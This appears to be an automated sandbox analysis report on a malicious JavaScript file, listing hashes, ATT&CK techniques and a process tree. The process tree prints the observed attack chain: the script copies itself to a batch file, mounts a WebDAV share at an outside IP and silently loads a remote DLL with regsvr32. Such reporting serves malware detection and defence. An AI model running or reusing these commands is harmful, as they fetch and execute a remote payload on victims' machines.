9e36caa4ce08f71500ee851d9661c96af19572d0bc14cc4f52c71459c86d55d2

Analysis

max time kernel
124s
max time network
129s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
09-07-2024 06:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3196914214168893502.js
Size

5KB
MD5

f8e548cebdeb938069478f2129a4db9c
SHA1

6c433fca0377733e77dacf7f0affb5834e788562
SHA256

ba1ba1779f8881981956c8299c71b448bce1d6d788fabc76eaac9275ab7921b8
SHA512

b7990b24372ea5c2448fc1d5936dfb037cf5aa6976d4b168c3f5f6610adb2f4994d4d248ceda2ec1d02988f3691a06218fa43737c8227e23f8c123cb27cefd71
SSDEEP

96:3BRG8KeMricUlRbHLLyAcnH0xPw7SkRw75:3BRb7MmcUnLJcH0xlkRY

Score

7^/10

execution

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-661257284-3186977026-4220467887-1000\Control Panel\International\Geo\Nation	wscript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3596 wrote to memory of 4008	3596	wscript.exe	91
PID 3596 wrote to memory of 4008	3596	wscript.exe	91
PID 4008 wrote to memory of 3876	4008	cmd.exe	94
PID 4008 wrote to memory of 3876	4008	cmd.exe	94
PID 4008 wrote to memory of 4420	4008	cmd.exe	95
PID 4008 wrote to memory of 4420	4008	cmd.exe	95

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\3196914214168893502.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3596
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\3196914214168893502.js" "C:\Users\Admin\\jrivkr.bat" && "C:\Users\Admin\\jrivkr.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4008
- - C:\Windows\system32\net.exe
    net use \\45.9.74.13@8888\DavWWWRoot\
    3⤵
    PID:3876
- - C:\Windows\system32\regsvr32.exe
    regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\213.dll
    3⤵
    PID:4420

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3796,i,17211346206607097582,14783440229797954268,262144 --variations-seed-version --mojo-platform-channel-handle=2960 /prefetch:8
1⤵
PID:3228

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\jrivkr.bat

Filesize
5KB

MD5
f8e548cebdeb938069478f2129a4db9c

SHA1
6c433fca0377733e77dacf7f0affb5834e788562

SHA256
ba1ba1779f8881981956c8299c71b448bce1d6d788fabc76eaac9275ab7921b8

SHA512
b7990b24372ea5c2448fc1d5936dfb037cf5aa6976d4b168c3f5f6610adb2f4994d4d248ceda2ec1d02988f3691a06218fa43737c8227e23f8c123cb27cefd71

Download Submit